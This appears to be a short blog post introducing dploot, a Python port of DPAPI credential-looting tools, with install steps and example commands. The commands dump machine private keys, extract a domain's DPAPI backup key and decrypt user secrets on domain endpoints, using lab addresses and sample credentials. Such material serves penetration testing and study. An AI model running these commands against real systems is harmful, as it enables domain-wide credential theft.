dploot
- Thiru T
- Nov 23, 2024
- 1 min read
DPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data where a user password is typically used to set the 'master key' (in a user scenario). So to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault etc) we just need access to a password.
dploot is Python rewrite of SharpDPAPI written un C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.
Install: (Pip)
pip install dplootInstall: (Git)
git clone https://github.com/zblurx/dploot.git
cd dploot
makeUsage:
# Loot decrypted machine private key files as a Windows local administrator
dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet
# Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)
dploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet
# Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints
dploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk -quiet 
Comments